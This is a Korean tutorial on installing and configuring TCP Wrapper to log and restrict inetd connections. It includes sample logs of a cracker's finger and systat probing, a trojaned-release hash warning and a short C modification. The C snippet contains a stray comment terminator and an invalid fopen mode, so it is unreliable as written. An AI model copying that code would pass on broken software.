 Wrapper는 외부에서 들어오는 호스트를 체크하는 방어의 의미를 가지고 있는 것으로 그 중에 유명한 것이 TCP Wrapper 이다 . 이것은 호스트에 들어오려는 곳의 IP Address 를 체크하여 관리자가 접속을 허용한 호스트 들만을 접속을 하기 때문에 외부로의 크래킹으로부터 방어를 할 수 있다 . 이것은 inetd 라는 daemon( 이것은 뒤에 설명 ) 을 교체하여 IP Address 를 체크하는 모듈을 가지고 있다.
 TCP Wrapper 와 비슷한 기능을 제공하는 보다 보안이 강화된 INETD 버전으로 시간에 따라 서비스를 제한하는 기능을 가진 xinetd 라는 것도 있다 .

 3. How does it work?

 3.1 전형적인 UNIX TCP/IP networking
  거의 모든 TCP/IP protocal application 은 클라이언트 - 서버 모델이 기본이 된다.
  예를 들어 누군가가 telnet command 를 이용해서 호스트로 접속을 했다면 target host는 telnet server  process 를 시작할 것이다 . 그리고 그것은 유저가 로긴할 수 있도록 할 것이다 .

  이런 클라이언트 - 서버 모델의 예들은 다음과 같다.

client	server	application
telnet	telnetd	remote login
ftp	ftpd	file transfer
finger	fingerd	show users
systat	server	application

 Table 1. Examples of TCP/IP client-server pairs and their applications.

 보통 UNIX 시스템에서는 들어오는 모든 종류의 네트웍 커넥션을 기다리는 하나의 daemon 을 띄어서 사용을 하고 이 커넥션이 성립이 되었을 때 ( 보통 흔히 우리가 inetd 란 부르는 ) 이 daemon 이 적당한 서버 프로그램을 실행하게 된다 . 그리고 이 daemon 은 다시 sleep 가 되고 다른 커넥션을 기다리게 된다 .
 즉 ,telnet 의 경우에는
 [user] -- [telnet client] -- (inetd) -- [telnet server] -- [[login]]
 이용자는 telnet 프로그램 (netterm) 을 실행키켜 원하는 장비에 접속을 시도한다 . 이때 서버장비에서는 inetd 가 요청을 받아 inetd.conf 를 살펴본다음 telnetd 프로그램을 실행시킨다 .

 3.2 TCP_Wrapper 를 적용하면

 위의 방법을 이용하게 되면 크래커가 염탐하는 문제가 발생하게 된다 . 이런 문제를 해결하기 위해서는 현재 존재하는 네트웍 소프트웨어들은 바꾸는 것이 필요하다 . 그런 거기에서는 몇개의 문제점들이 존재하게 된다 .
   첫째로 우리는 현재 가지고 있는 시스템들인 Ultrix, SunOS 등의 UNIX 프로그램의 소
             스 라이센스를 가지고 있지 않다 . 그리고 또 우리는 물론 이런 소스들도 가지고 있지 않다 .
   둘째로 버클리 네트웍 소스 ( 대부분의 상업적인 UNIX TCP/IP 프로덕트로 발전되어진) 는 가능하다 .
             그러나 이것을 우리의 환경에 맞게 포팅을 하는 것은 아주 많은 시간이 걸릴 것이다 .

  Figure 1. The inetd daemon process listens on the ftp, telnet etc. network ports and waits for incoming con- nections. The figure shows that a user has connected to the telnet port.
 　

 Figure 2. The inetd process has started a telnet server process that connects the user to a login pro- cess. Meanwhile, inetd waits for other incoming con- nections.

 그러나 이런 존재하는 소프트웨어들을 바꾸지 않고 문제를 해결하는 간단한 방법이 존재한다 . 그리고 이 방법은 거의 모든 UNIX 시스템에서 작동을 하기 때문에 간단히 해결할 수
 있다 . 그 방법은 스왑을 만드는 것이다 . 즉 벤더에서 제공하는 네트워크 서버 프로그램을 다른 곳에다 옮기고 원래의 네트워크 서버 프로그램의 자리에 간단한 프로그램을 인스톨하는 것이다 . 그래서 커넥션이 맺여질 때마다 이 간단한 프로그램이 리모트 호스트의 이름을 기록하고 , 확인한 다음에 원래의 네트워크 서버 프로그램을 실행시키는 것이다. 이런 방법을 이용한 것이 TCP Wrapper이다.
 

 Figure 3. The original telnet server program has been moved to some other place, and the tcp wrapper has tak- en its place. The wrapper logs the name of the remote host to a file.

 Figure 4. The tcp wrapper program has started the real telnet server and no longer participates. The user can- not notice any difference.

 아래는 TCP_Wrapper 를 적용한 예를 보여주는 것으로 콘솔에 나타나는 기록이다 . 처음의 약간은 크래커가 접속하려고한 흔적이 보였고 각각의 커넥션은 time stamp, the name of the local host,the name of the requested service (actually, the network server process name), and the name of the remote host 순으로 적혀 있는 것이다 . 이 예는 크래커가 단지 monk.rutgers.edu 와 같은 dial-up terminal server 를 사용했다는 것 뿐만아니라 군사기관 (.MIL) 과 대학 컴퓨터 시스템 (.EDU) 을 침입했다는 것도 보여준다 .
 (ftp://ftp.porcupine.org/pub/security/tcp_wrapper.txt.Z 에서 인용 )

     May 21 14:06:53 tuegate: systatd: connect from monk.rutgers.edu
     May 21 16:08:45 tuegate: systatd: connect from monk.rutgers.edu
     May 21 16:13:58 trf.urc: systatd: connect from monk.rutgers.edu
     May 21 18:38:17 tuegate: systatd: connect from ap1.eeb.ele.tue.nl
     May 21 23:41:12 tuegate: systatd: connect from mcl2.utcs.utoronto.ca
     May 21 23:48:14 tuegate: systatd: connect from monk.rutgers.edu

     May 22 01:08:28 tuegate: systatd: connect from HAWAII-EMH1.PACOM.MIL
     May 22 01:14:46 tuewsd:  fingerd: connect from HAWAII-EMH1.PACOM.MIL
     May 22 01:15:32 tuewso:  fingerd: connect from HAWAII-EMH1.PACOM.MIL
     May 22 01:55:46 tuegate: systatd: connect from monk.rutgers.edu
     May 22 01:58:33 tuegate: systatd: connect from monk.rutgers.edu
     May 22 02:00:14 tuewsd:  fingerd: connect from monk.rutgers.edu
     May 22 02:14:51 tuegate: systatd: connect from RICHARKF-TCACCIS.ARMY.MIL
     May 22 02:19:45 tuewsd:  fingerd: connect from RICHARKF-TCACCIS.ARMY.MIL
     May 22 02:20:24 tuewso:  fingerd: connect from RICHARKF-TCACCIS.ARMY.MIL

     May 22 14:43:29 tuegate: systatd: connect from monk.rutgers.edu
     May 22 15:08:30 tuegate: systatd: connect from monk.rutgers.edu
     May 22 15:09:19 tuewse:  fingerd: connect from monk.rutgers.edu
     May 22 15:14:27 tuegate: telnetd: connect from cumbic.bmb.columbia.edu
     May 22 15:23:06 tuegate: systatd: connect from cumbic.bmb.columbia.edu
     May 22 15:23:56 tuewse:  fingerd: connect from cumbic.bmb.columbia.edu

 여기에서 크래커는 사실상 finger 와 systat 로 시스템을 공격을 한 것이나 마찬가지다 왜냐하면 finger 나 systat 는 시스템에 누가 있는 지를 알수 있게 해주는 것이기 때문이다 . 그 후에 크래커는 telnet 커넥션을 맺으려고 했다 . 아마 추측컨대 single login 시도를 했고 즉시 끊었을 것이다 . 그래서 "repeated login failure" 라 콘솔에 기록되지 않았을 것이다 .

 크래커를 구분하는 방법은 다음과 같이 쉽다 .

 첫째로 대체로 다른 사람들의 활동이 거의 없는 밤에 종종 활동한다 .
 둘째로 자주 연속된 커넥션을 맺는다 . 그런데 커넥션을 맺는 시간에 간격을 띄어서 자산    의 활동을 숨기려고 한다 . 그러나 여러 시스템의 로그를 합침으로써 크래커가 들    어왔었다는 것을 보는 것이 쉽다 .
 셋째로 시스템에 계정이 있는 사람은 누구도 systat service 를 사용하지 않는다 .

이렇게 TCP_Wrapper 를 사용하게 되면 자신이 원하는 호스트들로부터의 접속만을 허용할 뿐아니라 자신의 시스템의 접속을 확인하고 모니터링을 할 수 있게 한다 .

다음의 예는 실제로 syslog를 살펴본 것으로 telnet 과 ftp에 대하여 다음과 같이 각각의 데몬에 대하여 원하는
자신의 원하는 호스트로만의 접속이 이루어지게 되는 것을 볼 수 있다.

Mar  7 23:12:53 major in.telnetd[22706]: connect from kbs06.kaist.ac.kr
Mar  7 23:22:25 major in.telnetd[22761]: connect from taehan.kaist.ac.kr
Mar  8 00:48:52 major in.telnetd[22954]: refused connect from 143.248.175.120

Mar  8 10:09:21 major in.telnetd[23279]: connect from kbs08.kaist.ac.kr
Mar  8 10:41:36 major in.ftpd[23588]: refused connect from gec09.kaist.ac.kr
Mar  8 11:04:21 major in.telnetd[23608]: connect from kbs22.kaist.ac.kr
Mar  8 11:09:49 major in.telnetd[23657]: connect from kbs09.kaist.ac.kr
Mar  8 11:35:47 major in.telnetd[23736]: connect from kbs06.kaist.ac.kr
Mar  8 11:38:09 major in.telnetd[23772]: refused connect from captain

 4. How to install and use TCP_Wrapper

 현재 99 년 1 월의 CERT advisory 를 보면 TCP Wrapper 의 Trojan horse version 이 돌아다닌다는 보고가 있었다 . 아래와 같은 차이가 있으므로 확인을 하고 잘 받기를 바란다.
 자세한 사항은 http://www.cert.org/advisories/CA-99-01-Trojan-TCP-Wrappers.html 에서 확인
 받는 곳 : ftp://ftp.porcupine.org/pub/security/

Correct version:
           tcp_wrappers_7.6.tar.gz
           MD5 = e6fa25f71226d090f34de3f6b122fb5a
           size = 99438
           tcp_wrappers_7.6.tar
           MD5 = 5da85a422a30045a62da165404575d8e
           size = 360448

Trojan Horse version:
           tcp_wrappers_7.6.tar.gz
           MD5 = af7f76fb9960a95a1341c1777b48f1df
           size = 99186

 이 설치법은 정주원님의 허락을 받고기재하는것임을밝힙니다.

                성질급한 사람들을 위한 TCP wrapper 설치법
                =========================================

0. RedHat linux라면 tcp_wrapper가 설치되어 있다. 14단계로 간다.

1. tcp_wrappers_x.x.tar를 ftp에서 받아온다.

2. tar xf tcp_wrappers_x.x.tar 를 실행하여 tar 화일을 푼다.

3. cd tcp_wrappers_x.x 한다.

4. README를 읽는다.
   (경고: Ultrix나 IRIX에 설치하고자 하는 사람은 필히 README 화일과 README.
          IRIX 화일을 읽어 보아야 한다.)

5. uname -a를 실행하여 자신의 시스템이 무엇인지 확인한다.

6. Makefile을 보고 적당한 REAL_DAEMON_DIR을 선택하여 맨 앞의 #를 제거한다.
   (REAL_DAEMON_DIR이란 in.telnetd, in.rlogind와 같은 internet daemon들이
    실재할 위치를 말한다. 여기서 이미 설치되어 있는 directory를 선택하면
    제 11 단계를 빼먹어도 좋으나, 일반적으로 별도의 directory에 보호할
    internet daemon을 설치하는 것을 권장하고 있다.)

7. make를 실행하여 자신의 sys-type code가 있는지 확인한다. 자신의 sys-type
   code가 없으면 README를 자세히 읽고 그대로 따라서 한다.

8. make {sys-type} 을 실행하여 compile한다.
        예) make irix6          (Irix 6.x의 경우)
            make sunos5         (Solaris 2.x의 경우)
            make CC=gcc sunos5  (Solaris 2.x에서 gcc로 compile 하는 경우)

9. 제대로 컴파일 되었으면 superuser가 된 후 tcpd를 적당한 장소에 설치한다.
        예) /usr/ucb/install -o bin -g bin -m 755 tcpd /usr/local/sbin

10. inetd.conf를 보고, 외부 연결로부터 보호할 서비스들을 골라 tcpd가
    보호하도록 수정한다. inetd.conf는 /etc/inetd.conf 혹은
    /etc/inet/inetd.conf에 있다.
        예) finger service의 경우
           finger stream tcp nowait nobody /usr/etc/in.fingerd   in.fingerd
                                                           
           라고 되어있는 것을

           finger stream tcp nowait nobody /usr/local/sbin/tcpd  in.fingerd
                                                           
           로 바꾼다. 단, tcpd의 설치 위치에 따라 달라질 수 있다.

11. REAL_DAEMON_DIR이 실제 internet daemon이 설치된 위치와 다르다면 (6단계
    참조) 보호하고자 하는 service에 해당하는 internet daemon을
    REAL_DAEMON_DIR 로 복사한다. (cp -p option을 쓰는 것이 좋다.)

12. tcpdchk를 실행하여 제대로 고쳤는지 확인한다. (tcpdchk는 compile했던 그
    자리에 있다.) 문제점이 나타나면 9단계부터 다시 살펴본다.

13. ps ax 혹은 ps -ef 를 하여 inetd을 PID를 알아내고 kill -1 inetd.pid를
    수행한다. (IRIX설치자는 README.IRIX 참조) 이것으로 tcp_wrapper의
    설치는 끝났다.

14. /etc/hosts.deny라는 화일을 만들고 그 내용을 ALL:ALL로 함으로서
    모든 호스트의 접근을 금지시킨다.
    (tcpwrapper에 포함되어 있는 safe_finger등으로 좀 더 재미있는 일을
     할 수 있다. 자세한 내용은 README를 참조하라.)

15. /etc/hosts.allow라는 화일을 만들고 그 내용을 {daemon 이름}:{허가할
    호스트 명단} 으로 집어넣어 해당 호스트만 접근하도록 한다.

        예) ALL: myhome.kaist.ac.kr
            in.telnetd: labpc1.kaist.ac.kr,143.248.230.45
            in.pop3d: 143.248.0.0/255.255.0.0

16. 과 기계등을 이용하여 외부 호스트에서 접근 가능한지 시도해 본다.

6. Reference
http://user.chollian.net/~imtino/int/tcp_wrapper.html
http://www.certcc.or.kr/tools/index.html
ftp://ftp.porcupine.org/pub/security/index.html
ftp://ftp.porcupine.org/pub/security/tcp_wrapper.txt.Z
ftp://camis.kaist.ac.kr/pub/security/util/quick_install.ko.txt

참고 :
tcp wrapper 소스에서 clean_exit.c 의 clean_exit() 가 termination function인데
이것을 고쳐서 만약 허락되지 않는 호스트의 접속일 경우에 윈하는 메시지를 보여주고 접속을
끊을 수 있다.

 * 이것은 최재철( poison@inzen.com )님의 아이디어임을 밝힙니다.

void    clean_exit(request)
struct request_info *request;
{

    /*
     * In case of unconnected protocols we must eat up the not-yet received
     * data or inetd will loop.
     */

    if (request->sink)
        request->sink(request->fd);

    /*
     * Be kind to the inetd. We already reported the problem via the syslogd,
     * and there is no need for additional garbage in the logfile.
     */

     */
    denymsg();
 
    sleep(5);
    exit(0);
}

FILE *fp;
void denymsg()
{

        register int fd, nchars;
        int i;
        char tbuf[8192];

        fp = fopen("/dev/stdout", "rw");

        /* 허가되지 않은 호스트의 경우에 보여줄 메시지는 /etc/deny.msg 에 */
        if ((fd = open("/etc/deny.msg", O_RDONLY, 0)) < 0)
                return;
        while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
               (void)write(fileno(stdout), tbuf, nchars);
        (void)close(fd);

}